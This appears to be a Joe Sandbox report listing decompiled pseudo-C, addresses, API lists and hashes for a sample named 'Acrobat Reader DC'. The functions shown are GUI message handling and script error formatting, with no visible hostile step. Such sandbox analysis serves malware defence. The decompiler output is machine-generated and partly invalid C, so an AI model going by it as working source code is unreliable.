												__eflags = _t144 - 0xffffffff;
												if(_t144 == 0xffffffff) {
													_t145 =  *_t176 & 0x0000ffff;
													_a4 = _t176;
													__eflags = _t145 -  *0x4a8644; // 0x7c
													if(__eflags == 0) {
														L16:
														_a4 = CharNextW(_t176);
														SendMessageW(_t175, _v20, 0, 0);
													} else {
														__eflags = _t145;
														if(__eflags != 0) {
															while(1) {
																L18:
																__eflags = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
																if(__eflags == 0) {
																	break;
																}
																SendMessageW(_t175, _v24, 0,  &_v8456);
															}
															_t150 = _a12;
															__eflags = _t150;
															if(_t150 == 0) {
																goto L69;
															} else {
																_t151 = SendMessageW(_t175, _v16, 0xffffffff, _t150);
																__eflags = _t151 - 0xffffffff;
																if(_t151 == 0xffffffff) {
																	goto L69;
																} else {
																	SendMessageW(_t175, _v12, _t151, 0);
																	return 1;
																}
															}
															goto L70;
														} else {
															goto L16;
														}
													}
													goto L18;
												} else {
													SendMessageW(_t175, _v12, _t144, 0);
													E00430B87(_a8, _t159, 1);
													goto L13;
												}
											} else {
												goto L10;
											}
											goto L70;
										case 1:
											__eax = _a12;
											__eflags = __eax;
											if(__eax == 0) {
												L29:
												SetWindowTextW(__edi, __esi) = SendMessageW(__edi, 0xb1, 0xf4240, 0xf423f);
												_a8[0x72] = 0xffffffff;
												__eax = 1;
												return 1;
											} else {
												__eflags =  *__eax;
												if( *__eax == 0) {
													goto L29;
												} else {
													SendMessageW(__edi, 0xc2, 1, __esi) = 1;
													return 1;
												}
											}
											goto L70;
										case 2:
											 &_v88 = E00432A10(__ecx, __esi,  &_v88, 1, 1);
											__ecx =  &_v88;
											_push( &_v88);
											goto L31;
										case 3:
											L10:
											return _t138 | 0xffffffff;
											goto L70;
										case 4:
											__eax = E00413BED(__esi);
											asm("fnstcw word [ebp+0xa]");
											__eax = _a6 & 0x0000ffff;
											__eax = _a6 & 0x0000ffff | 0x00000c00;
											__eflags = __eax;
											_a12 = __eax;
											__esp = __esp + 4;
											asm("fldcw word [ebp+0x10]");
											asm("fistp qword [ebp-0x1c]");
											__ecx = _v32;
											asm("fldcw word [ebp+0xa]");
											SendMessageW(__edi, 0x402, _v32, 0) = 1;
											return 1;
											goto L70;
										case 5:
											 &_v220 =  *(__ecx + 0x18c);
											_v220 = 1;
											_v208 = __esi;
											__eax = SendMessageW( *(__ecx + 0x18c), 0x133d,  *(__ebx + 0x8b) & 0x000000ff,  &_v220);
											__eflags = __eax;
											if(__eax == 0) {
												goto L13;
											} else {
												__eflags =  *(__ebx + 0x8b) - 0xff;
												if( *(__ebx + 0x8b) == 0xff) {
													goto L69;
												} else {
													__ecx = _a8;
													InvalidateRect( *_a8, 0, 1) = 1;
													return 1;
												}
											}
											goto L70;
										case 6:
											_push(0x208);
											__eax = E004115D7(__edi, __esi, __eflags);
											__ecx = _a4;
											__esp = __esp + 4;
											__edi = __eax;
											__eax =  &_v168;
											_v168.cbSize = 0x30;
											_v168.fMask = 0x10;
											_v168.dwTypeData = __edi;
											_v168.cch = 0x104;
											__eax = GetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
											__eflags = __eax;
											if(__eax == 0) {
												L65:
												_push(__edi);
												__eax = E004111DC();
												__esp = __esp + 4;
												__eax = 0;
												__eflags = 0;
												return 0;
											} else {
												__eflags = _v168.fType & 0x00000800;
												if((_v168.fType & 0x00000800) != 0) {
													goto L65;
												} else {
													__ecx = _a4;
													__eax =  &_v168;
													_v168.dwTypeData = __esi;
													__eax = SetMenuItemInfoW( *(__ebx + 8), _a4, 0,  &_v168);
													__eflags = __eax;
													if(__eax == 0) {
														goto L65;
													} else {
														__eax = _a8;
														__ecx =  *_a8;
														__eax = DrawMenuBar( *_a8);
														_push(__edi);
														__eax = E004111DC();
														__esp = __esp + 4;
														__eax = 1;
														return 1;
													}
												}
											}
											goto L70;
										case 7:
											__eax =  *(__ebx + 0xc);
											__ecx =  &_v260;
											_push( &_v260);
											_push(0);
											_push(0x113f);
											_v260 = 1;
											_v256 =  *(__ebx + 0xc);
											_v244 = __esi;
											_push( *(__ebx + 0x30));
											goto L33;
										case 8:
											__eax = E00413BED(__esi);
											__eax = 1;
											return 1;
											goto L70;
										case 9:
											__eflags = __esi;
											if(__esi == 0) {
												goto L10;
											} else {
												__ecx =  &_v120;
												__eax = E00412F40( &_v120, 0, 0x20);
												__ebx = 0;
												__eflags = 0;
												_a4 = __esi;
												while(1) {
													 &_v8456 = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
													__eflags = __al;
													if(__al == 0) {
														break;
													}
													__eflags = _v8456;
													__ecx =  &_v8456;
													_v120 = 4;
													_v108 =  &_v8456;
													if(__eflags == 0) {
														L42:
														__ebx =  &(__ebx->i);
														continue;
													} else {
														__eflags = SendMessageW(__edi, 0x1060, __ebx,  &_v120);
														if(__eflags == 0) {
															goto L13;
														} else {
															goto L42;
														}
													}
													goto L70;
												}
												__eax = E004111C1(__esi);
												__eflags = __eax;
												if(__eax == 0) {
													L45:
													__ecx = _a4;
													_push( &_v120);
													_push(__ebx);
													_v108 = _a4;
													_push(0x1060);
													goto L32;
												} else {
													__eax = E004111C1(__esi);
													__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
													if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
														goto L69;
													} else {
														goto L45;
													}
												}
											}
											goto L70;
										case 0xa:
											__ebx =  *(__ebx + 0x30);
											__eflags = __esi;
											if(__esi == 0) {
												goto L10;
											} else {
												 &_v72 = E00412F40( &_v72, 0, 0x28);
												__ecx = _a4;
												__edi = SendMessageW;
												_v192 = 1;
												_v184 = _a4;
												__eax = SendMessageW(__ebx, 0x1053, 0xffffffff,  &_v192);
												_v68 = __eax;
												__eflags = __eax - 0xffffffff;
												if(__eflags == 0) {
													goto L13;
												} else {
													_a12 = 0;
													_a4 = __esi;
													while(1) {
														__eax =  &_a4;
														__ecx =  &_v8456;
														__eax = E00430626(__eflags,  &_v8456,  &_a4, 0x4a8644);
														__eflags = __al;
														if(__al == 0) {
															break;
														}
														__eflags = _v8456;
														__ecx = _a12;
														__eax = 1;
														_v72 = 1;
														_v52 =  &_v8456;
														_v64 = _a12;
														if(__eflags == 0) {
															L53:
															_a12 = _a12 + __eax;
															continue;
														} else {
															__eax = _v68;
															_push( &_v72);
															_push(_v68);
															_push(0x1074);
															_push(__ebx);
															__eax = __edi->i();
															__eflags = _v68;
															if(__eflags == 0) {
																goto L13;
															} else {
																__eax = 1;
																goto L53;
															}
														}
														goto L70;
													}
													__eax = E004111C1(__esi);
													__eflags = __eax;
													if(__eax == 0) {
														L56:
														__eax = _a12;
														__ecx =  &_v72;
														_push( &_v72);
														_v52 = _a4;
														_push(_v68);
														_push(0x1074);
														_push(__ebx);
														_v64 = _a12;
														__eax = __edi->i();
														goto L34;
													} else {
														__eax = E004111C1(__esi);
														__eflags =  *((intOrPtr*)(__esi + __eax * 2 - 2)) -  *0x4a8644;
														if( *((intOrPtr*)(__esi + __eax * 2 - 2)) !=  *0x4a8644) {
															goto L69;
														} else {
															goto L56;
														}
													}
												}
											}
											goto L70;
										case 0xb:
											__eax = E00413BED(__esi);
											 *(__ebx + 0x48) = __eax;
											__eax = 1;
											return 1;
											goto L70;
										case 0xc:
											E00432A10(__ecx, __esi,  &_v88, 1, 1) =  &_v88;
											_push( &_v88);
											L31:
											_push(0);
											_push(0x1002);
											L32:
											_push(__edi);
											L33:
											__eax = SendMessageW();
											L34:
											__eflags = __eax;
											if(__eax != 0) {
												L69:
												return 1;
											} else {
												return __eax;
											}
											goto L70;
										case 0xd:
											goto L66;
									}
								}
								goto L70;
						}
					}
				}
				L70:
			}
































                                  0x004491c1
                                  0x004491cb
                                  0x004491d1
                                  0x004491d4
                                  0x004491d7
                                  0x004491da
                                  0x004491f2
                                  0x004492c9
                                  0x004492c9
                                  0x004492d1
                                  0x004491f8
                                  0x004491fb
                                  0x00449209
                                  0x00449212
                                  0x00449214
                                  0x0044921b
                                  0x0044921d
                                  0x00449223
                                  0x00449268
                                  0x0044926b
                                  0x0044926d
                                  0x00000000
                                  0x0044926f
                                  0x0044926f
                                  0x00449273
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449273
                                  0x00449225
                                  0x00449225
                                  0x00000000
                                  0x0044922c
                                  0x00449233
                                  0x0044923a
                                  0x00449241
                                  0x00000000
                                  0x00000000
                                  0x0044924a
                                  0x00449251
                                  0x00449258
                                  0x0044925f
                                  0x00000000
                                  0x00000000
                                  0x00449275
                                  0x00449278
                                  0x00449792
                                  0x00449792
                                  0x00449794
                                  0x00000000
                                  0x0044979a
                                  0x0044979c
                                  0x004497a2
                                  0x004497a4
                                  0x00000000
                                  0x004497aa
                                  0x004497b1
                                  0x00000000
                                  0x004497b1
                                  0x004497a4
                                  0x0044927e
                                  0x00449285
                                  0x00000000
                                  0x0044928e
                                  0x004492a4
                                  0x004492aa
                                  0x004492ad
                                  0x004492d4
                                  0x004492d7
                                  0x004492da
                                  0x004492e1
                                  0x004492e8
                                  0x004492f7
                                  0x00449301
                                  0x004492e3
                                  0x004492e3
                                  0x004492e6
                                  0x0044930b
                                  0x0044930b
                                  0x00449320
                                  0x00449322
                                  0x00000000
                                  0x00000000
                                  0x00449332
                                  0x00449332
                                  0x00449336
                                  0x00449339
                                  0x0044933b
                                  0x00000000
                                  0x00449341
                                  0x00449349
                                  0x0044934b
                                  0x0044934e
                                  0x00000000
                                  0x00449354
                                  0x0044935c
                                  0x00449369
                                  0x00449369
                                  0x0044934e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004492e6
                                  0x00000000
                                  0x004492af
                                  0x004492b7
                                  0x004492c4
                                  0x00000000
                                  0x004492c4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004493f7
                                  0x004493fa
                                  0x004493fc
                                  0x00449421
                                  0x00449439
                                  0x00449442
                                  0x0044944c
                                  0x00449457
                                  0x004493fe
                                  0x004493fe
                                  0x00449402
                                  0x00000000
                                  0x00449404
                                  0x00449413
                                  0x0044941e
                                  0x0044941e
                                  0x00449402
                                  0x00000000
                                  0x00000000
                                  0x00449463
                                  0x0044946b
                                  0x0044946e
                                  0x00000000
                                  0x00000000
                                  0x00449290
                                  0x00449299
                                  0x00000000
                                  0x00000000
                                  0x0044936f
                                  0x00449374
                                  0x00449377
                                  0x0044937b
                                  0x0044937b
                                  0x00449380
                                  0x00449383
                                  0x00449386
                                  0x00449389
                                  0x0044938c
                                  0x00449396
                                  0x0044939f
                                  0x004493aa
                                  0x00000000
                                  0x00000000
                                  0x00449693
                                  0x004496a0
                                  0x004496aa
                                  0x004496b0
                                  0x004496b6
                                  0x004496b8
                                  0x00000000
                                  0x004496be
                                  0x004496be
                                  0x004496c5
                                  0x00000000
                                  0x004496cb
                                  0x004496cb
                                  0x004496db
                                  0x004496e6
                                  0x004496e6
                                  0x004496c5
                                  0x00000000
                                  0x00000000
                                  0x004496e9
                                  0x004496ee
                                  0x004496f3
                                  0x004496f9
                                  0x004496fc
                                  0x004496fe
                                  0x00449709
                                  0x00449713
                                  0x0044971d
                                  0x00449720
                                  0x00449727
                                  0x0044972d
                                  0x0044972f
                                  0x0044977e
                                  0x0044977e
                                  0x0044977f
                                  0x00449784
                                  0x00449787
                                  0x00449787
                                  0x0044978f
                                  0x00449731
                                  0x00449731
                                  0x0044973b
                                  0x00000000
                                  0x0044973d
                                  0x0044973d
                                  0x00449743
                                  0x0044974e
                                  0x00449751
                                  0x00449757
                                  0x00449759
                                  0x00000000
                                  0x0044975b
                                  0x0044975b
                                  0x0044975e
                                  0x00449761
                                  0x00449767
                                  0x00449768
                                  0x0044976d
                                  0x00449770
                                  0x0044977b
                                  0x0044977b
                                  0x00449759
                                  0x0044973b
                                  0x00000000
                                  0x00000000
                                  0x00449655
                                  0x0044965b
                                  0x00449661
                                  0x00449662
                                  0x00449664
                                  0x00449669
                                  0x00449673
                                  0x00449679
                                  0x0044967f
                                  0x00000000
                                  0x00000000
                                  0x004493ae
                                  0x004493ca
                                  0x004493d5
                                  0x00000000
                                  0x00000000
                                  0x004494a5
                                  0x004494a7
                                  0x00000000
                                  0x004494ad
                                  0x004494af
                                  0x004494b5
                                  0x004494bd
                                  0x004494bd
                                  0x004494bf
                                  0x004494c9
                                  0x004494d9
                                  0x004494de
                                  0x004494e0
                                  0x00000000
                                  0x00000000
                                  0x004494e2
                                  0x004494ea
                                  0x004494f0
                                  0x004494f7
                                  0x004494fa
                                  0x00449515
                                  0x00449515
                                  0x00000000
                                  0x004494fc
                                  0x0044950d
                                  0x0044950f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044950f
                                  0x00000000
                                  0x004494fa
                                  0x00449519
                                  0x00449521
                                  0x00449523
                                  0x00449540
                                  0x00449540
                                  0x00449546
                                  0x00449547
                                  0x00449548
                                  0x0044954b
                                  0x00000000
                                  0x00449525
                                  0x00449526
                                  0x00449533
                                  0x0044953a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044953a
                                  0x00449523
                                  0x00000000
                                  0x00000000
                                  0x00449555
                                  0x00449558
                                  0x0044955a
                                  0x00000000
                                  0x00449560
                                  0x00449568
                                  0x0044956d
                                  0x00449570
                                  0x00449588
                                  0x00449592
                                  0x00449598
                                  0x0044959a
                                  0x0044959d
                                  0x004495a0
                                  0x00000000
                                  0x004495a6
                                  0x004495a6
                                  0x004495ad
                                  0x004495b0
                                  0x004495b5
                                  0x004495b9
                                  0x004495c0
                                  0x004495c5
                                  0x004495c7
                                  0x00000000
                                  0x00000000
                                  0x004495c9
                                  0x004495d1
                                  0x004495d4
                                  0x004495df
                                  0x004495e2
                                  0x004495e5
                                  0x004495e8
                                  0x00449607
                                  0x00449607
                                  0x00000000
                                  0x004495ea
                                  0x004495ea
                                  0x004495f0
                                  0x004495f1
                                  0x004495f2
                                  0x004495f7
                                  0x004495f8
                                  0x004495fa
                                  0x004495fc
                                  0x00000000
                                  0x00449602
                                  0x00449602
                                  0x00000000
                                  0x00449602
                                  0x004495fc
                                  0x00000000
                                  0x004495e8
                                  0x0044960d
                                  0x00449615
                                  0x00449617
                                  0x00449634
                                  0x00449637
                                  0x0044963a
                                  0x0044963d
                                  0x0044963e
                                  0x00449644
                                  0x00449645
                                  0x0044964a
                                  0x0044964b
                                  0x0044964e
                                  0x00000000
                                  0x00449619
                                  0x0044961a
                                  0x00449627
                                  0x0044962e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044962e
                                  0x00449617
                                  0x004495a0
                                  0x00000000
                                  0x00000000
                                  0x004493d9
                                  0x004493e6
                                  0x004493e9
                                  0x004493f4
                                  0x00000000
                                  0x00000000
                                  0x0044949f
                                  0x004494a2
                                  0x0044946f
                                  0x0044946f
                                  0x00449471
                                  0x00449476
                                  0x00449476
                                  0x00449477
                                  0x00449477
                                  0x0044947d
                                  0x0044947d
                                  0x0044947f
                                  0x004497b8
                                  0x004497c1
                                  0x0044948b
                                  0x0044948b
                                  0x0044948b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00449285
                                  0x00000000
                                  0x00000000
                                  0x00449225
                                  0x00449223
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E0045E737(void* __fp0, struct HINSTANCE__* _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v52;
				char _v68;
				WCHAR* _v84;
				short _v8280;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t51;
				intOrPtr _t96;
				WCHAR* _t100;
				WCHAR* _t118;
				intOrPtr _t119;
				intOrPtr _t129;
				intOrPtr _t131;
				struct HINSTANCE__* _t132;
				void* _t146;

				_t146 = __fp0;
				_t51 = E00422240(0x2058);
				if( *0x4974e2 == 0) {
					_t51 = _a4;
					_t138 =  *((intOrPtr*)(_t51 + 0xf8)) - 1;
					if( *((intOrPtr*)(_t51 + 0xf8)) != 1) {
						LoadStringW( *0x497520, 0x66,  &_v8280, 0xfff);
						_t118 =  &_v8280;
						E00401B10(_t118,  &_v84, _t138);
						_t111 =  *0x497520;
						LoadStringW( *0x497520, _a8, _t118, 0xfff);
						E00401B10(_t118,  &_v68, _t138);
						_t129 =  *((intOrPtr*)(_a4 + 0xf4));
						_v36 = E004348DE(_t129);
						_t119 = E004348AA(_t129);
						_v28 = _t119;
						_t96 = E00434908(E0043492F(_t129));
						_v32 = _t96;
						_t100 =  &_v8280;
						_t139 = _t96;
						if(_t96 == 0) {
							_t111 = _a4;
							_push( *((intOrPtr*)(_a4 + 0xc8)));
							_push(_t129);
						} else {
							_push(_t96);
							_push(_t119);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t100);
						E0041329B(_t111);
						E00401B10( &_v8280,  &_v24, _t139);
						_t131 = _v36;
						_t140 = _t131;
						if(_t131 != 0) {
							E0040D200( &_v24, _t100, _t131, _t146);
							E0040D200( &_v24, _t100, "\n", _t146);
						}
						_t101 =  &_v52;
						E0040BC70( &_v52, _t140);
						_t121 = _a12;
						if(_a12 >= 0) {
							E0040C600(E00402160( &_v52, _t131, _t111, _t121) | 0xffffffff,  &_v52, _t121);
							E0040D200( &_v52,  &_v52, L"^ ERROR", _t146);
							E0040BD50( &_v24, _t146,  &_v52);
							E0040D200( &_v24,  &_v52, "\n", _t146);
							_t96 = _v32;
						}
						E0040D200( &_v24, _t101, L"\nError: ", _t146);
						E0040BD50( &_v24, _t146,  &_v68);
						if( *0x4974e8 == 0) {
							MessageBoxW( *0x497518, _v24, _v84, 0x11010);
							goto L14;
						} else {
							_t144 = _t96;
							if(_t96 == 0) {
								_t132 = _a4;
								_push(_v68);
								_push( *((intOrPtr*)(_t132 + 0xf4)));
								_push( *((intOrPtr*)(_t132 + 0xc8)));
								_push(L"%s (%d) : ==> %s:\n");
								E00413ABE(_t96, _v68, L"\nError: ", _t132, __eflags);
								L15:
								 *((intOrPtr*)(_t132 + 0xf8)) = 1;
								if( *((char*)(_t132 + 0x118)) == 0) {
									 *0x4974f4 = 1;
								} else {
									 *0x4974f4 = _a8 + 0x7ffff000;
								}
								E00402250( &_v52);
								E00402250( &_v24);
								E00402250( &_v68);
								return E00402250( &_v84);
							}
							_push(_v52);
							_push(_t131);
							_push(_v68);
							_push(_v28);
							_push(_t96);
							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
							E00413ABE(_t96, _v52, L"\nError: ", _t131, _t144);
							L14:
							_t132 = _a4;
							goto L15;
						}
					}
				}
				return _t51;
			}
























                                  0x0045e737
                                  0x0045e73f
                                  0x0045e74e
                                  0x0045e754
                                  0x0045e757
                                  0x0045e75e
                                  0x0045e77f
                                  0x0045e781
                                  0x0045e78a
                                  0x0045e792
                                  0x0045e7a0
                                  0x0045e7a5
                                  0x0045e7ad
                                  0x0045e7ba
                                  0x0045e7c2
                                  0x0045e7c5
                                  0x0045e7d3
                                  0x0045e7d5
                                  0x0045e7d8
                                  0x0045e7de
                                  0x0045e7e0
                                  0x0045e7e6
                                  0x0045e7ef
                                  0x0045e7f0
                                  0x0045e7e2
                                  0x0045e7e2
                                  0x0045e7e3
                                  0x0045e7e3
                                  0x0045e7f1
                                  0x0045e7f6
                                  0x0045e7f7
                                  0x0045e808
                                  0x0045e80d
                                  0x0045e810
                                  0x0045e812
                                  0x0045e819
                                  0x0045e826
                                  0x0045e826
                                  0x0045e82b
                                  0x0045e82e
                                  0x0045e833
                                  0x0045e838
                                  0x0045e84c
                                  0x0045e859
                                  0x0045e865
                                  0x0045e872
                                  0x0045e877
                                  0x0045e877
                                  0x0045e882
                                  0x0045e88e
                                  0x0045e89a
                                  0x0045e8f5
                                  0x00000000
                                  0x0045e89c
                                  0x0045e89c
                                  0x0045e89e
                                  0x0045e8c0
                                  0x0045e8cf
                                  0x0045e8d0
                                  0x0045e8d1
                                  0x0045e8d2
                                  0x0045e8d7
                                  0x0045e8fe
                                  0x0045e90a
                                  0x0045e910
                                  0x0045e923
                                  0x0045e912
                                  0x0045e91b
                                  0x0045e91b
                                  0x0045e92b
                                  0x0045e933
                                  0x0045e93b
                                  0x00000000
                                  0x0045e943
                                  0x0045e8a9
                                  0x0045e8aa
                                  0x0045e8ab
                                  0x0045e8ac
                                  0x0045e8ad
                                  0x0045e8ae
                                  0x0045e8b3
                                  0x0045e8fb
                                  0x0045e8fb
                                  0x00000000
                                  0x0045e8fb
                                  0x0045e89a
                                  0x0045e75e
                                  0x0045e94e

                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                  • __swprintf.LIBCMT ref: 0045E7F7
                                  • _wprintf.LIBCMT ref: 0045E8B3
                                  • _wprintf.LIBCMT ref: 0045E8D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-2354261254
                                  • Opcode ID: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                  • Opcode Fuzzy Hash: 44e01960a33580a095bbf2e3e13559187395cafc70d58b6b713acd2f3f366ced
                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004531B1(intOrPtr* _a4) {
				char _v20;
				char _v152;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 =  *((intOrPtr*)(_t38 + 8));
				if(_t30 == 4) {
					return _t30;
				} else {
					_t31 = _t30 - 1;
					if(_t31 > 0xa) {
						L17:
						_v152 = 0;
						goto L18;
					} else {
						switch( *((intOrPtr*)(_t31 * 4 +  &M00453385))) {
							case 0:
								E0041305C( *_t38,  &_v152, 0xa);
								_t50 = _t50 + 0xc;
								goto L18;
							case 1:
								__eax =  *(__ebx + 4);
								__ecx =  *__ebx;
								_t7 =  &_v152; // -148
								__edx = _t7;
								__eax = E00413109( *__ebx,  *(__ebx + 4), _t7, 0xa);
								goto L18;
							case 2:
								__esp = __esp - 8;
								 *__esp =  *__ebx;
								_t8 =  &_v152; // -148
								__edx = _t8;
								_push(L"%.15g");
								_push(__edx);
								__eax = E0041329B(__edx);
								__esp = __esp + 0x10;
								goto L18;
							case 3:
								goto L17;
							case 4:
								__eax =  *__ebx;
								_t9 =  &_v152; // -148
								__ecx = _t9;
								__eax = E0041329B(__edx, _t9, L"0x%p",  *__ebx);
								goto L18;
							case 5:
								__eflags =  *__ebx;
								if( *__ebx == 0) {
									_t11 =  &_v152; // -148
									_t11 = E00411567(_t11, L"False");
								} else {
									_t10 =  &_v152; // -148
									__edx = _t10;
									__eax = E00411567(_t10, L"True");
								}
								goto L18;
							case 6:
								__edx =  *__ebx;
								_t12 =  &_v20; // -16
								__ecx = _t12;
								E0044B3F6( *__ebx, _t12) =  *__eax;
								_t13 =  &_v152; // -148
								__ecx = _t13;
								__eax = E00411567(_t13, __eax);
								_t14 =  &_v20; // -16
								__ecx = _t14;
								__eax = E00402250(_t14);
								L18:
								E00403D80(_t38);
								_push(0x10);
								_t33 = E004115D7(_t41, _t38, _t53);
								_t54 = _t33;
								if(_t33 == 0) {
									__eflags = 0;
									 *((intOrPtr*)(_t38 + 0xc)) = 0;
									return 0;
								}
								_t35 = E00401B10( &_v152, _t33, _t54);
								 *((intOrPtr*)(_t38 + 0xc)) = _t35;
								return _t35;
								goto L22;
							case 7:
								__edx =  *__ebx;
								__esi =  *( *__ebx);
								__ecx = 0;
								__eax = 6 + __esi * 4;
								2 = __eax * 2 >> 0x20;
								__eax = __eax * 2;
								0 | __eflags > 0x00000000 =  ~(__eflags > 0);
								__ecx =  ~(__eflags > 0) | __eax;
								_push( ~(__eflags > 0) | __eax);
								__edi = E004115D7(__edi, __esi, __eflags);
								__eax =  *__ebx;
								__esp = __esp + 4;
								__eflags =  *__eax;
								if( *__eax == 0) {
									__eax = 0;
									__eflags = 0;
									 *__edi = __ax;
								} else {
									__ecx =  *__eax;
									__edx =  *(__eax + 4);
									__eax = E00432DFC( *(__eax + 4), __edi,  *__eax);
								}
								__esi = __ebx;
								__eax = E00403D80(__esi);
								_push(0x10);
								__eax = E004115D7(__edi, __esi, __eflags);
								__esp = __esp + 4;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__eflags = 0;
									_push(__edi);
									 *(__ebx + 0xc) = 0;
									__eax = E004111DC();
									__esp = __esp + 4;
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__esi = __eax;
									__eax = E00401B10(__edi, __eax, __eflags);
									_push(__edi);
									 *(__ebx + 0xc) = __eax;
									__eax = E004111DC();
									__esp = __esp + 4;
									_pop(__edi);
									_pop(__esi);
									return __eax;
								}
								goto L22;
						}
					}
				}
				L22:
			}








                                  0x004531bb
                                  0x004531be
                                  0x004531c4
                                  0x00453380
                                  0x004531ca
                                  0x004531ca
                                  0x004531d0
                                  0x0045333e
                                  0x00453340
                                  0x00000000
                                  0x004531d6
                                  0x004531d6
                                  0x00000000
                                  0x004531e9
                                  0x004531ee
                                  0x00000000
                                  0x00000000
                                  0x004531f6
                                  0x004531f9
                                  0x004531fd
                                  0x004531fd
                                  0x00453206
                                  0x00000000
                                  0x00000000
                                  0x00453215
                                  0x00453218
                                  0x0045321b
                                  0x0045321b
                                  0x00453221
                                  0x00453226
                                  0x00453227
